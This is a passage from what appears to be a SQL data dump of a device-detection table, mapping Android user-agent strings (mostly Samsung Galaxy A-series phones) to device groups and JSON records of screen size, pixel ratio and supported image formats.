Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A102U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A102U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A102W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A105F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A105FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A105G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A105M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A107F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A107M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A202F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A205F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A205FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A205G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A205GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A205U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A205U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A205W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A205YN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A2070) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A207F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A207M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A3050) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A305F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A305FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A305G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A305GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A305GT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A307FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A307G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A307GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A307GT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A405FM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A405FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A505F) AppleWebKit/* (KHTML, like Gecko) Chrome','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A505F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A505FM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A505FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A505G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A505GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A505GT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A505U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A505U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A505W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A505YN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A507FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A530F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A530N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A530W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A600A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A600AZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A600F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A600FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A600G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A600GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A600P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A600T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A600T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A600U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A605F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A605FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A605G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A605GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A6060) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A606Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A7050) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A705F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A705FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A705GM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A705MN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A705W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A705YN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A730F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A750F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A750FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A750G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A750GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A805F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A908B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A908N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-A920F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-F900F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":585,\"screenHeight\":820,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G390F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G390W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 